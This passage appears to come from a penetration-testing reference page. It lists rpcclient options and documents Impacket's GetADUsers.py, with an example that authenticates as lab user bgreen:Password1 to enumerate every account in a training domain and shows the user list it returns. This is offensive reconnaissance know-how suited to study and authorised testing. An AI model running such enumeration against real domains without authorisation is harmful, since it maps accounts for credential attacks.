  -I, --dest-ip=IP                       Specify destination IP address
  -p, --port=PORT                        Specify port number
 
Help options:
  -?, --help                             Show this help message
      --usage                            Display brief usage message
 
Common samba options:
  -d, --debuglevel=DEBUGLEVEL            Set debug level
  -s, --configfile=CONFIGFILE            Use alternate configuration file
  -l, --log-basename=LOGFILEBASE         Base name for log files
  -V, --version                          Print version
      --option=name=value                Set smb.conf option from command line
 
Connection options:
  -O, --socket-options=SOCKETOPTIONS     socket options to use
  -n, --netbiosname=NETBIOSNAME          Primary netbios name
  -W, --workgroup=WORKGROUP              Set the workgroup name
  -i, --scope=SCOPE                      Use this Netbios scope
 
Authentication options:
  -U, --user=USERNAME                    Set the network username
  -N, --no-pass                          Don't ask for a password
  -k, --kerberos                         Use kerberos (active directory) authentication
  -A, --authentication-file=FILE         Get the credentials from a file
  -S, --signing=on|off|required          Set the client signing state
  -P, --machine-pass                     Use stored machine account password
  -e, --encrypt                          Encrypt SMB transport
  -C, --use-ccache                       Use the winbind ccache for authentication
      --pw-nt-hash                       The supplied password is the NT hash

Examples

rpcclient <ip> -U <user>

This command establishes an RPC session with the server.

 enum<TabTab>

From the rpcclient prompt, you can tab-complete commands, for example the enum* family of commands.

Blog Posts

GetADUsers.py

Description

Part of the Impacket network tool suite. Enumerates all AD users, provided you have valid credentials for the domain.

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
usage: GetADUsers.py [-h] [-user username] [-all] [-ts] [-debug]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address]
                     target
 
Queries target domain for users data
 
positional arguments:
  target                domain/username[:password]
 
optional arguments:
  -h, --help            show this help message and exit
  -user username        Requests data for specific user
  -all                  Return all users, including those with no email
                        addresses and disabled accounts. When used with -user
                        it will return user's info even if the account is
                        disabled
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter

Examples

 GetADUsers.py hiboxy.com/bgreen:Password1 -dc-ip x.x.x.x -all | tee /tmp/adusers.txt

This command will enumerate all users in the hiboxy domain using the credentials for bgreen.

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
[*] Querying 10.130.10.4 for information about domain.
Name                 Email                          PasswordLastSet     LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator                                       2022-03-14 14:24:35.183246 2022-03-14 14:24:39.485072
Guest                                               <never>             <never>
SROCAdmin                                           2022-03-14 14:24:43.164622 <never>
krbtgt                                              2022-03-14 14:31:12.537996 <never>
SVC_SQLService       SVC_SQLService@hiboxy.com      2022-03-14 14:32:16.637564 <never>
SVC_SQLService2                                     2022-03-14 14:32:16.778834 <never>
krosterman                                          2022-03-14 14:32:16.841622 <never>
smorgan              smorgan@hiboxy.com             2022-03-14 14:32:16.904391 <never>
tduncan              tduncan@hiboxy.com             2022-03-14 14:32:16.951489 2022-03-14 14:36:23.957238
antivirus                                           2022-03-14 14:32:17.861892 <never>
aallen                                              2022-03-14 14:32:17.940372 <never>
aalvarado                                           2022-03-14 14:32:18.018868 <never>
abaird                                              2022-03-14 14:32:18.097351 <never>
...
wortega                                             2022-03-14 14:32:58.110061 <never>
wrobinson                                           2022-03-14 14:32:58.188474 <never>
wstanley                                            2022-03-14 14:32:58.251129 <never>
wwade                                               2022-03-14 14:32:58.329487 <never>
wwilson                                             2022-03-14 14:32:58.392172 <never>
zclayton                                            2022-03-14 14:32:58.470533 <never>
$VJ1000-O3GM981V807M                                <never>             <never>
SM_aaa538fcd9a742de9 SystemMailbox{1f05a927-b919-458d-bebd-92c52421d9be}@hiboxy.com <never>             <never>
SM_92d45bee00ee49769 SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@hiboxy.com <never>             <never>
SM_1f4403d8339543fcb SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@hiboxy.com <never>             <never>
SM_54e3d4f14fe84c84a DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@hiboxy.com <never>             <never>
SM_035c725ae06c4cf38 Migration.8f3e7716-2011-43e4-96b1-aba62d229136@hiboxy.com <never>             <never>
SM_fbadcdb332e74005a FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@hiboxy.com <never>             <never>
SM_f804d6dd51144fc5a SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@hiboxy.com <never>             <never>
SM_ea5a510e6bfd4c758 SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@hiboxy.com <never>             <never>
SM_76b5d049aad445e4a SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@hiboxy.com <never>             <never>
HealthMailboxf81d76d HealthMailboxf81d76db0dbd441ba35044828baa42e7@hiboxy.com 2022-03-14 15:16:49.293057 2022-03-15 23:54:55.305462
HealthMailboxd31f130 HealthMailboxd31f130f2c6748c0a6f57fcfb3beec46@hiboxy.com 2022-03-14 15:16:54.265986 2022-03-15 21:43:19.596318

Blog Posts